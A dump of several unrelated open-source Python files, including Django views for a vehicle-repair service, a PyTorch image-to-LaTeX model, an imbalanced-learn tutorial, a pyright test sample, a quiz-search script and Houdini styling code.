return render(request,'vehicle/admin_view_attendance_ask_date.html',{'form':form})
@login_required(login_url='adminlogin')
def admin_report_view(request):
reports=models.Request.objects.all().filter(Q(status="Repairing Done") | Q(status="Released"))
dict={
'reports':reports,
}
return render(request,'vehicle/admin_report.html',context=dict)
@login_required(login_url='adminlogin')
def admin_feedback_view(request):
feedback=models.Feedback.objects.all().order_by('-id')
return render(request,'vehicle/admin_feedback.html',{'feedback':feedback})
#============================================================================================
# ADMIN RELATED views END
#============================================================================================
#============================================================================================
# CUSTOMER RELATED views start
#============================================================================================
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_dashboard_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
work_in_progress=models.Request.objects.all().filter(customer_id=customer.id,status='Repairing').count()
work_completed=models.Request.objects.all().filter(customer_id=customer.id).filter(Q(status="Repairing Done") | Q(status="Released")).count()
new_request_made=models.Request.objects.all().filter(customer_id=customer.id).filter(Q(status="Pending") | Q(status="Approved")).count()
bill=models.Request.objects.all().filter(customer_id=customer.id).filter(Q(status="Repairing Done") | Q(status="Released")).aggregate(Sum('cost'))
print(bill)
dict={
'work_in_progress':work_in_progress,
'work_completed':work_completed,
'new_request_made':new_request_made,
'bill':bill['cost__sum'],
'customer':customer,
}
return render(request,'vehicle/customer_dashboard.html',context=dict)
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_request_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
return render(request,'vehicle/customer_request.html',{'customer':customer})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_view_request_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
enquiries=models.Request.objects.all().filter(customer_id=customer.id , status="Pending")
return render(request,'vehicle/customer_view_request.html',{'customer':customer,'enquiries':enquiries})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_delete_request_view(request,pk):
customer=models.Customer.objects.get(user_id=request.user.id)
enquiry=models.Request.objects.get(id=pk)
enquiry.delete()
return redirect('customer-view-request')
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_view_approved_request_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
enquiries=models.Request.objects.all().filter(customer_id=customer.id).exclude(status='Pending')
return render(request,'vehicle/customer_view_approved_request.html',{'customer':customer,'enquiries':enquiries})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_view_approved_request_invoice_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
enquiries=models.Request.objects.all().filter(customer_id=customer.id).exclude(status='Pending')
return render(request,'vehicle/customer_view_approved_request_invoice.html',{'customer':customer,'enquiries':enquiries})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_add_request_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
enquiry=forms.RequestForm()
if request.method=='POST':
enquiry=forms.RequestForm(request.POST)
if enquiry.is_valid():
customer=models.Customer.objects.get(user_id=request.user.id)
enquiry_x=enquiry.save(commit=False)
enquiry_x.customer=customer
enquiry_x.save()
else:
print("form is invalid")
return HttpResponseRedirect('customer-dashboard')
return render(request,'vehicle/customer_add_request.html',{'enquiry':enquiry,'customer':customer})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_profile_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
return render(request,'vehicle/customer_profile.html',{'customer':customer})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def edit_customer_profile_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
user=models.User.objects.get(id=customer.user_id)
userForm=forms.CustomerUserForm(instance=user)
customerForm=forms.CustomerForm(request.FILES,instance=customer)
mydict={'userForm':userForm,'customerForm':customerForm,'customer':customer}
if request.method=='POST':
userForm=forms.CustomerUserForm(request.POST,instance=user)
customerForm=forms.CustomerForm(request.POST,instance=customer)
if userForm.is_valid() and customerForm.is_valid():
user=userForm.save()
user.set_password(<PASSWORD>)
user.save()
customerForm.save()
return HttpResponseRedirect('customer-profile')
return render(request,'vehicle/edit_customer_profile.html',context=mydict)
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_invoice_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
enquiries=models.Request.objects.all().filter(customer_id=customer.id).exclude(status='Pending')
return render(request,'vehicle/customer_invoice.html',{'customer':customer,'enquiries':enquiries})
@login_required(login_url='customerlogin')
@user_passes_test(is_customer)
def customer_feedback_view(request):
customer=models.Customer.objects.get(user_id=request.user.id)
feedback=forms.FeedbackForm()
if request.method=='POST':
feedback=forms.FeedbackForm(request.POST)
if feedback.is_valid():
feedback.save()
else:
print("form is invalid")
return render(request,'vehicle/feedback_sent_by_customer.html',{'customer':customer})
return render(request,'vehicle/customer_feedback.html',{'feedback':feedback,'customer':customer})
#============================================================================================
# CUSTOMER RELATED views END
#============================================================================================
#============================================================================================
# MECHANIC RELATED views start
#============================================================================================
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_dashboard_view(request):
mechanic=models.Mechanic.objects.get(user_id=request.user.id)
work_in_progress=models.Request.objects.all().filter(mechanic_id=mechanic.id,status='Repairing').count()
work_completed=models.Request.objects.all().filter(mechanic_id=mechanic.id,status='Repairing Done').count()
new_work_assigned=models.Request.objects.all().filter(mechanic_id=mechanic.id,status='Approved').count()
dict={
'work_in_progress':work_in_progress,
'work_completed':work_completed,
'new_work_assigned':new_work_assigned,
'salary':mechanic.salary,
'mechanic':mechanic,
}
return render(request,'vehicle/mechanic_dashboard.html',context=dict)
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_work_assigned_view(request):
mechanic=models.Mechanic.objects.get(user_id=request.user.id)
works=models.Request.objects.all().filter(mechanic_id=mechanic.id)
return render(request,'vehicle/mechanic_work_assigned.html',{'works':works,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_update_status_view(request,pk):
mechanic=models.Mechanic.objects.get(user_id=request.user.id)
updateStatus=forms.MechanicUpdateStatusForm()
if request.method=='POST':
updateStatus=forms.MechanicUpdateStatusForm(request.POST)
if updateStatus.is_valid():
enquiry_x=models.Request.objects.get(id=pk)
enquiry_x.status=updateStatus.cleaned_data['status']
enquiry_x.save()
else:
print("form is invalid")
return HttpResponseRedirect('/mechanic-work-assigned')
return render(request,'vehicle/mechanic_update_status.html',{'updateStatus':updateStatus,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_attendance_view(request):
mechanic=models.Mechanic.objects.get(user_id=request.user.id)
attendaces=models.Attendance.objects.all().filter(mechanic=mechanic)
return render(request,'vehicle/mechanic_view_attendance.html',{'attendaces':attendaces,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_feedback_view(request):
mechanic=models.Mechanic.objects.get(user_id=request.user.id)
feedback=forms.FeedbackForm()
if request.method=='POST':
feedback=forms.FeedbackForm(request.POST)
if feedback.is_valid():
feedback.save()
else:
print("form is invalid")
return render(request,'vehicle/feedback_sent.html',{'mechanic':mechanic})
return render(request,'vehicle/mechanic_feedback.html',{'feedback':feedback,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_salary_view(request):
mechanic=models.Mechanic.objects.get(user_id=request.user.id)
workdone=models.Request.objects.all().filter(mechanic_id=mechanic.id).filter(Q(status="Repairing Done") | Q(status="Released"))
return render(request,'vehicle/mechanic_salary.html',{'workdone':workdone,'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def mechanic_profile_view(request):
mechanic=models.Mechanic.objects.get(user_id=request.user.id)
return render(request,'vehicle/mechanic_profile.html',{'mechanic':mechanic})
@login_required(login_url='mechaniclogin')
@user_passes_test(is_mechanic)
def edit_mechanic_profile_view(request):
mechanic=models.Mechanic.objects.get(user_id=request.user.id)
user=models.User.objects.get(id=mechanic.user_id)
userForm=forms.MechanicUserForm(instance=user)
mechanicForm=forms.MechanicForm(request.FILES,instance=mechanic)
mydict={'userForm':userForm,'mechanicForm':mechanicForm,'mechanic':mechanic}
if request.method=='POST':
userForm=forms.MechanicUserForm(request.POST,instance=user)
mechanicForm=forms.MechanicForm(request.POST,request.FILES,instance=mechanic)
if userForm.is_valid() and mechanicForm.is_valid():
user=userForm.save()
user.set_password(<PASSWORD>)
user.save()
mechanicForm.save()
return redirect('mechanic-profile')
return render(request,'vehicle/edit_mechanic_profile.html',context=mydict)
#============================================================================================
# MECHANIC RELATED views start
#============================================================================================
# for aboutus and contact
def aboutus_view(request):
return render(request,'vehicle/aboutus.html')
def contactus_view(request):
sub = forms.ContactusForm()
if request.method == 'POST':
sub = forms.ContactusForm(request.POST)
if sub.is_valid():
email = sub.cleaned_data['Email']
name=sub.cleaned_data['Name']
message = sub.cleaned_data['Message']
send_mail(str(name)+' || '+str(email),message,settings.EMAIL_HOST_USER, settings.EMAIL_RECEIVING_USER, fail_silently = False)
return render(request, 'vehicle/contactussuccess.html')
return render(request, 'vehicle/contactus.html', {'form':sub})
|
model/img2seq_torch.py | marcoleewow/LaTeX_OCR | 290 | 10707 | <gh_stars>100-1000
import time
import sys
import os
import numpy as np
import torch
import torch.nn as nn
import torchvision.models as models
from torch.nn.utils.rnn import pack_padded_sequence
from model.base_torch import BaseModel
from model.utils.general import init_dir, get_logger
from model.utils.general import Progbar
from model.utils.general import Config
from model.utils.general import minibatches
from model.components.SimpleCNN import SimpleCNN
from model.components.ResNet import ResNet9
from model.components.DenseNet import DenseNet169
from model.components.seq2seq_torch import EncoderCNN, DecoderWithAttention, Img2Seq
from model.evaluation.text import score_files, truncate_end, write_answers
from model.utils.image import pad_batch_images_2
from model.utils.text import pad_batch_formulas
from torch.utils.data import Dataset
import h5py
import json
from model.utils.data_generator import DataGenerator
class ImgFormulaDataset(Dataset):
"""
A PyTorch Dataset class to be used in a PyTorch DataLoader to create batches.
"""
def __init__(self, data_generator: DataGenerator, transform=None):
"""
:param data_folder: folder where data files are stored
:param data_name: base name of processed datasets
:param split: split, one of 'TRAIN', 'VAL', or 'TEST'
:param transform: image transform pipeline
"""
self.data_generator = data_generator
# PyTorch transformation pipeline for the image (normalizing, etc.)
self.transform = transform
def __getitem__(self, i):
# Remember, the Nth caption corresponds to the (N // captions_per_image)th image
(img, formula) = self.data_generator.__getitem__(i)
img = pad_batch_images_2([img], [800, 800, 1])
# img = torch.tensor(img, dtype=torch.int8) # (N, W, H, C)
# img = img.squeeze(0)
# img = img.permute(2, 0, 1) # (C, W, H)
# if self.transform is not None:
# img = self.transform(img)
# formula = torch.tensor(formula, dtype=torch.int) # (C, W, H), (TOKEN)
return img, formula
def __len__(self):
return len(self.data_generator)
class Img2SeqModel(BaseModel):
def __init__(self, config, dir_output, vocab):
super(Img2SeqModel, self).__init__(config, dir_output)
self._vocab = vocab
def getModel(self, model_name="CNN"):
if model_name == "CNN":
return SimpleCNN()
elif model_name == "ResNet9":
return ResNet9()
elif model_name == "DenseNet169":
return DenseNet169(pretrained=True)
elif model_name == "Img2Seq":
self.encoder = EncoderCNN(self._config)
self.decoder = DecoderWithAttention(attention_dim=512,
embed_dim=512,
decoder_dim=512,
vocab_size=self._vocab.n_tok,
dropout=0.5)
return Img2Seq(self._config, self._vocab)
def getOptimizer(self, lr_method='adam', lr=0.001):
self.encoder_optimizer = torch.optim.Adam(params=self.encoder.parameters(), lr=lr)
self.decoder_optimizer = torch.optim.Adam(params=self.decoder.parameters(), lr=lr)
return super().getOptimizer(lr_method=lr_method, lr=lr)
def _run_train_epoch(self, config, train_set, val_set, epoch, lr_schedule):
"""Performs an epoch of training
Args:
config: Config instance
train_set: Dataset instance
val_set: Dataset instance
epoch: (int) id of the epoch, starting at 0
lr_schedule: LRSchedule instance that takes care of learning proc
Returns:
score: (float) model will select weights that achieve the highest score
"""
# logging
batch_size = config.batch_size
nbatches = (len(train_set) + batch_size - 1) // batch_size
prog = Progbar(nbatches)
self.model.train()
self.encoder.train()
self.decoder.train()
train_loader = torch.utils.data.DataLoader(ImgFormulaDataset(train_set),
batch_size=batch_size,
shuffle=True, num_workers=3, pin_memory=True)
# for i, (img, formula) in enumerate(train_loader):
for i, (img, formula) in enumerate(minibatches(train_set, batch_size)):
img = pad_batch_images_2(img)
img = torch.FloatTensor(img) # (N, W, H, C)
formula, formula_length = pad_batch_formulas(formula, self._vocab.id_pad, self._vocab.id_end)
img = img.permute(0, 3, 1, 2) # (N, C, W, H)
formula = torch.LongTensor(formula) # (N,)
loss_eval = self.getLoss(img, formula=formula, lr=lr_schedule.lr, dropout=config.dropout, training=True)
prog.update(i + 1, [("loss", loss_eval), ("lr", lr_schedule.lr)])
# update learning rate
lr_schedule.update(batch_no=epoch*nbatches + i)
self.logger.info("- Training: {}".format(prog.info))
# evaluation
config_eval = Config({"dir_answers": self._dir_output + "formulas_val/", "batch_size": config.batch_size})
scores = self.evaluate(config_eval, val_set)
score = scores["perplexity"]
lr_schedule.update(score=score)
return score
def getLoss(self, img, formula, lr, dropout, training=True):
# Move to GPU, if available
img = img.to(self.device)
formula = formula.to(self.device)
# Forward prop.
imgs = self.encoder(img)
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(
imgs, formula, torch.LongTensor([[len(i)] for i in formula]))
# Since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# Remove timesteps that we didn't decode at, or are pads
# pack_padded_sequence is an easy trick to do this
scores, _ = pack_padded_sequence(scores, decode_lengths, batch_first=True)
targets, _ = pack_padded_sequence(targets, decode_lengths, batch_first=True)
# Calculate loss
loss = self.criterion(scores, targets)
alpha_c = 1.
# Add doubly stochastic attention regularization
loss += alpha_c * ((1. - alphas.sum(dim=1)) ** 2).mean()
# Back prop.
self.decoder_optimizer.zero_grad()
if self.encoder_optimizer is not None:
self.encoder_optimizer.zero_grad()
loss.backward()
# Update weights
self.decoder_optimizer.step()
if self.encoder_optimizer is not None:
self.encoder_optimizer.step()
return -loss.item()
def _run_evaluate_epoch(self, config, test_set):
"""Performs an epoch of evaluation
Args:
test_set: Dataset instance
params: (dict) with extra params in it
- "dir_name": (string)
Returns:
scores: (dict) scores["acc"] = 0.85 for instance
"""
self.model.eval()
self.encoder.eval()
self.decoder.eval()
# initialize containers of references and predictions
if self._config.decoding == "greedy":
refs, hyps = [], [[]]
elif self._config.decoding == "beam_search":
refs, hyps = [], [[] for i in range(self._config.beam_size)]
references = list() # references (true captions) for calculating BLEU-4 score
hypotheses = list() # hypotheses (predictions)
with torch.no_grad():
nbatches = len(test_set)
prog = Progbar(nbatches)
test_loader = torch.utils.data.DataLoader(ImgFormulaDataset(test_set),
batch_size=nbatches,
shuffle=True, num_workers=3, pin_memory=True)
for i, (img, formula) in enumerate(minibatches(test_set, nbatches)):
# print(type(img), len(img), img[0].shape)
# print(type(formula), formula)
# Move to GPU, if available
img = pad_batch_images_2(img)
img = torch.FloatTensor(img) # (N, W, H, C)
formula, formula_length = pad_batch_formulas(formula, self._vocab.id_pad, self._vocab.id_end)
img = img.permute(0, 3, 1, 2) # (N, C, W, H)
formula = torch.LongTensor(formula) # (N,)
img = img.to(self.device)
formula = formula.to(self.device)
# Forward prop.
imgs = self.encoder(img)
scores, caps_sorted, decode_lengths, alphas, sort_ind = self.decoder(imgs, formula, torch.LongTensor([[len(i)] for i in formula]))
# Since we decoded starting with <start>, the targets are all words after <start>, up to <end>
targets = caps_sorted[:, 1:]
# Remove timesteps that we didn't decode at, or are pads
# pack_padded_sequence is an easy trick to do this
scores, _ = pack_padded_sequence(scores, decode_lengths, batch_first=True)
targets, _ = pack_padded_sequence(targets, decode_lengths, batch_first=True)
# Calculate loss
loss = self.criterion(scores, targets)
print(scores.shape, targets.shape)
print(loss)
alpha_c = 1.
# Add doubly stochastic attention regularization
loss += alpha_c * ((1. - alphas.sum(dim=1)) ** 2).mean()
loss_eval = loss.item()
prog.update(i + 1, [("loss", loss_eval), ("perplexity", np.exp(loss_eval))])
# Store references (true captions), and hypothesis (prediction) for each image
# If for n images, we have n hypotheses, and references a, b, c... for each image, we need -
# references = [[ref1a, ref1b, ref1c], [ref2a, ref2b], ...], hypotheses = [hyp1, hyp2, ...]
# print("---------------------------------------------------------------formula and prediction :")
for form, preds in zip(formula, scores):
refs.append(form)
# print(form, " ---------- ", preds[0])
for i, pred in enumerate(preds):
hyps[i].append(pred)
files = write_answers(refs, hyps, self._vocab.id_to_tok, config.dir_answers, self._vocab.id_end)
scores = score_files(files[0], files[1])
# perp = - np.exp(ce_words / float(n_words))
# scores["perplexity"] = perp
self.logger.info("- Evaluating: {}".format(prog.info))
return {
"perplexity": loss.item()
}
def predict_batch(self, images):
preds = []
images = images.to(self.device)
outputs = self.model(images)
_, predicted = torch.max(outputs.data, 1)
pr = outputs[:, 1].detach().cpu().numpy()
for i in pr:
preds.append(i)
return preds
def predict(self, img):
return self.predict_batch([img])
|
icons.py | jasantunes/alfred-golinks | 312 | 10730 | <gh_stars>100-1000
# encoding: utf-8
#
# Copyright (c) 2019 <NAME> <<EMAIL>>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2019-09-06
#
"""Overlay check mark on icons."""
from __future__ import print_function, absolute_import
from Cocoa import (
NSBitmapImageRep,
NSPNGFileType,
NSImage,
NSMakeSize,
NSCompositeCopy,
NSSizeToCGSize,
NSZeroPoint,
)
from CoreGraphics import CGRectZero
def overlay(src, overlay, dest):
"""Create image ``dest`` by putting ``overlay`` on top of ``src``.
Args:
src (str): Path to source image.
overlay (str): Path to overlay image.
dest (str): Path to save combined image to.
"""
src = NSImage.alloc().initWithContentsOfFile_(src)
overlay = NSImage.alloc().initWithContentsOfFile_(overlay)
img = NSImage.alloc().initWithSize_(src.size())
img.lockFocus()
rect = (0, 0), src.size()
src.drawInRect_(rect)
overlay.drawInRect_(rect)
img.unlockFocus()
rep = NSBitmapImageRep.imageRepWithData_(img.TIFFRepresentation())
data = rep.representationUsingType_properties_(NSPNGFileType,{})
data.writeToFile_atomically_(dest, False)
|
examples/applications/plot_impact_imbalanced_classes.py | cdchushig/imbalanced-learn | 5,678 | 10769 | """
==========================================================
Fitting model on imbalanced datasets and how to fight bias
==========================================================
This example illustrates the problem induced by learning on datasets having
imbalanced classes. Subsequently, we compare different approaches alleviating
these negative effects.
"""
# Authors: <NAME> <<EMAIL>>
# License: MIT
# %%
print(__doc__)
# %% [markdown]
# Problem definition
# ------------------
#
# We are dropping the following features:
#
# - "fnlwgt": this feature was created while studying the "adult" dataset.
# Thus, we will not use this feature which is not acquired during the survey.
# - "education-num": it is encoding the same information than "education".
# Thus, we are removing one of these 2 features.
# %%
from sklearn.datasets import fetch_openml
df, y = fetch_openml("adult", version=2, as_frame=True, return_X_y=True)
df = df.drop(columns=["fnlwgt", "education-num"])
# %% [markdown]
# The "adult" dataset as a class ratio of about 3:1
# %%
classes_count = y.value_counts()
classes_count
# %% [markdown]
# This dataset is only slightly imbalanced. To better highlight the effect of
# learning from an imbalanced dataset, we will increase its ratio to 30:1
# %%
from imblearn.datasets import make_imbalance
ratio = 30
df_res, y_res = make_imbalance(
df,
y,
sampling_strategy={classes_count.idxmin(): classes_count.max() // ratio},
)
y_res.value_counts()
# %% [markdown]
# We will perform a cross-validation evaluation to get an estimate of the test
# score.
#
# As a baseline, we could use a classifier which will always predict the
# majority class independently of the features provided.
# %%
from sklearn.model_selection import cross_validate
from sklearn.dummy import DummyClassifier
dummy_clf = DummyClassifier(strategy="most_frequent")
scoring = ["accuracy", "balanced_accuracy"]
cv_result = cross_validate(dummy_clf, df_res, y_res, scoring=scoring)
print(f"Accuracy score of a dummy classifier: {cv_result['test_accuracy'].mean():.3f}")
# %% [markdown]
# Instead of using the accuracy, we can use the balanced accuracy which will
# take into account the balancing issue.
# %%
print(
f"Balanced accuracy score of a dummy classifier: "
f"{cv_result['test_balanced_accuracy'].mean():.3f}"
)
# %% [markdown]
# Strategies to learn from an imbalanced dataset
# ----------------------------------------------
# We will use a dictionary and a list to continuously store the results of
# our experiments and show them as a pandas dataframe.
# %%
index = []
scores = {"Accuracy": [], "Balanced accuracy": []}
# %% [markdown]
# Dummy baseline
# ..............
#
# Before to train a real machine learning model, we can store the results
# obtained with our :class:`~sklearn.dummy.DummyClassifier`.
# %%
import pandas as pd
index += ["Dummy classifier"]
cv_result = cross_validate(dummy_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# Linear classifier baseline
# ..........................
#
# We will create a machine learning pipeline using a
# :class:`~sklearn.linear_model.LogisticRegression` classifier. In this regard,
# we will need to one-hot encode the categorical columns and standardized the
# numerical columns before to inject the data into the
# :class:`~sklearn.linear_model.LogisticRegression` classifier.
#
# First, we define our numerical and categorical pipelines.
# %%
from sklearn.impute import SimpleImputer
from sklearn.preprocessing import StandardScaler
from sklearn.preprocessing import OneHotEncoder
from sklearn.pipeline import make_pipeline
num_pipe = make_pipeline(
StandardScaler(), SimpleImputer(strategy="mean", add_indicator=True)
)
cat_pipe = make_pipeline(
SimpleImputer(strategy="constant", fill_value="missing"),
OneHotEncoder(handle_unknown="ignore"),
)
# %% [markdown]
# Then, we can create a preprocessor which will dispatch the categorical
# columns to the categorical pipeline and the numerical columns to the
# numerical pipeline
# %%
from sklearn.compose import make_column_transformer
from sklearn.compose import make_column_selector as selector
preprocessor_linear = make_column_transformer(
(num_pipe, selector(dtype_include="number")),
(cat_pipe, selector(dtype_include="category")),
n_jobs=2,
)
# %% [markdown]
# Finally, we connect our preprocessor with our
# :class:`~sklearn.linear_model.LogisticRegression`. We can then evaluate our
# model.
# %%
from sklearn.linear_model import LogisticRegression
lr_clf = make_pipeline(preprocessor_linear, LogisticRegression(max_iter=1000))
# %%
index += ["Logistic regression"]
cv_result = cross_validate(lr_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# We can see that our linear model is learning slightly better than our dummy
# baseline. However, it is impacted by the class imbalance.
#
# We can verify that something similar is happening with a tree-based model
# such as :class:`~sklearn.ensemble.RandomForestClassifier`. With this type of
# classifier, we will not need to scale the numerical data, and we will only
# need to ordinal encode the categorical data.
# %%
from sklearn.preprocessing import OrdinalEncoder
from sklearn.ensemble import RandomForestClassifier
num_pipe = SimpleImputer(strategy="mean", add_indicator=True)
cat_pipe = make_pipeline(
SimpleImputer(strategy="constant", fill_value="missing"),
OrdinalEncoder(handle_unknown="use_encoded_value", unknown_value=-1),
)
preprocessor_tree = make_column_transformer(
(num_pipe, selector(dtype_include="number")),
(cat_pipe, selector(dtype_include="category")),
n_jobs=2,
)
rf_clf = make_pipeline(
preprocessor_tree, RandomForestClassifier(random_state=42, n_jobs=2)
)
# %%
index += ["Random forest"]
cv_result = cross_validate(rf_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# The :class:`~sklearn.ensemble.RandomForestClassifier` is as well affected by
# the class imbalanced, slightly less than the linear model. Now, we will
# present different approach to improve the performance of these 2 models.
#
# Use `class_weight`
# ..................
#
# Most of the models in `scikit-learn` have a parameter `class_weight`. This
# parameter will affect the computation of the loss in linear model or the
# criterion in the tree-based model to penalize differently a false
# classification from the minority and majority class. We can set
# `class_weight="balanced"` such that the weight applied is inversely
# proportional to the class frequency. We test this parametrization in both
# linear model and tree-based model.
# %%
lr_clf.set_params(logisticregression__class_weight="balanced")
index += ["Logistic regression with balanced class weights"]
cv_result = cross_validate(lr_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %%
rf_clf.set_params(randomforestclassifier__class_weight="balanced")
index += ["Random forest with balanced class weights"]
cv_result = cross_validate(rf_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# We can see that using `class_weight` was really effective for the linear
# model, alleviating the issue of learning from imbalanced classes. However,
# the :class:`~sklearn.ensemble.RandomForestClassifier` is still biased toward
# the majority class, mainly due to the criterion which is not suited enough to
# fight the class imbalance.
#
# Resample the training set during learning
# .........................................
#
# Another way is to resample the training set by under-sampling or
# over-sampling some of the samples. `imbalanced-learn` provides some samplers
# to do such processing.
# %%
from imblearn.pipeline import make_pipeline as make_pipeline_with_sampler
from imblearn.under_sampling import RandomUnderSampler
lr_clf = make_pipeline_with_sampler(
preprocessor_linear,
RandomUnderSampler(random_state=42),
LogisticRegression(max_iter=1000),
)
# %%
index += ["Under-sampling + Logistic regression"]
cv_result = cross_validate(lr_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %%
rf_clf = make_pipeline_with_sampler(
preprocessor_tree,
RandomUnderSampler(random_state=42),
RandomForestClassifier(random_state=42, n_jobs=2),
)
# %%
index += ["Under-sampling + Random forest"]
cv_result = cross_validate(rf_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# Applying a random under-sampler before the training of the linear model or
# random forest, allows to not focus on the majority class at the cost of
# making more mistake for samples in the majority class (i.e. decreased
# accuracy).
#
# We could apply any type of samplers and find which sampler is working best
# on the current dataset.
#
# Instead, we will present another way by using classifiers which will apply
# sampling internally.
#
# Use of specific balanced algorithms from imbalanced-learn
# .........................................................
#
# We already showed that random under-sampling can be effective on decision
# tree. However, instead of under-sampling once the dataset, one could
# under-sample the original dataset before to take a bootstrap sample. This is
# the base of the :class:`imblearn.ensemble.BalancedRandomForestClassifier` and
# :class:`~imblearn.ensemble.BalancedBaggingClassifier`.
# %%
from imblearn.ensemble import BalancedRandomForestClassifier
rf_clf = make_pipeline(
preprocessor_tree,
BalancedRandomForestClassifier(random_state=42, n_jobs=2),
)
# %%
index += ["Balanced random forest"]
cv_result = cross_validate(rf_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# The performance with the
# :class:`~imblearn.ensemble.BalancedRandomForestClassifier` is better than
# applying a single random under-sampling. We will use a gradient-boosting
# classifier within a :class:`~imblearn.ensemble.BalancedBaggingClassifier`.
from sklearn.experimental import enable_hist_gradient_boosting # noqa
from sklearn.ensemble import HistGradientBoostingClassifier
from imblearn.ensemble import BalancedBaggingClassifier
bag_clf = make_pipeline(
preprocessor_tree,
BalancedBaggingClassifier(
base_estimator=HistGradientBoostingClassifier(random_state=42),
n_estimators=10,
random_state=42,
n_jobs=2,
),
)
index += ["Balanced bag of histogram gradient boosting"]
cv_result = cross_validate(bag_clf, df_res, y_res, scoring=scoring)
scores["Accuracy"].append(cv_result["test_accuracy"].mean())
scores["Balanced accuracy"].append(cv_result["test_balanced_accuracy"].mean())
df_scores = pd.DataFrame(scores, index=index)
df_scores
# %% [markdown]
# This last approach is the most effective. The different under-sampling allows
# to bring some diversity for the different GBDT to learn and not focus on a
# portion of the majority class.
|
packages/pyright-internal/src/tests/samples/genericTypes12.py | sasano8/pyright | 4,391 | 10798 | # This sample tests the checker's ability to enforce
# type invariance for type arguments.
# pyright: strict
from typing import Dict, Union
foo: Dict[Union[int, str], str] = {}
bar: Dict[str, str] = {}
# This should generate an error because
# both type parameters for Dict are invariant,
# and str isn't assignable to Union[int, str].
foo = bar
|
native_prophet.py | 1143048123/cddh | 177 | 10803 | <gh_stars>100-1000
# coding: utf-8
# quote from kmaiya/HQAutomator
# 谷歌搜索部分原版搬运,未做修改
import time
import json
import requests
import webbrowser
questions = []
def get_answer():
resp = requests.get('http://htpmsg.jiecaojingxuan.com/msg/current',timeout=4).text
resp_dict = json.loads(resp)
if resp_dict['msg'] == 'no data':
return 'Waiting for question...'
else:
resp_dict = eval(str(resp))
question = resp_dict['data']['event']['desc']
question = question[question.find('.') + 1:question.find('?')]
if question not in questions:
questions.append(question)
webbrowser.open("https://www.baidu.com/s?ie=UTF-8&wd=" + question)
else:
return 'Waiting for new question...'
def main():
while True:
print(time.strftime('%H:%M:%S',time.localtime(time.time())))
print(get_answer())
time.sleep(1)
if __name__ == '__main__':
main()
|
python/ht/nodes/styles/styles.py | Hengle/Houdini-Toolbox | 136 | 10804 | """Classes representing color entries and mappings."""
# =============================================================================
# IMPORTS
# =============================================================================
from __future__ import annotations
# Standard Library
import re
from typing import TYPE_CHECKING, Optional, Tuple
if TYPE_CHECKING:
import hou
# =============================================================================
# CLASSES
# =============================================================================
class StyleConstant:
"""This class represents a named constant style.
:param name: The constant's name.
:param color: The constant's color.
:param color_type: The color type.
:param shape: The constant's shape.
:param file_path: The path to the definition file.
:return:
"""
def __init__(
self,
name: str,
color: hou.Color,
color_type: str,
shape: Optional[str] = None,
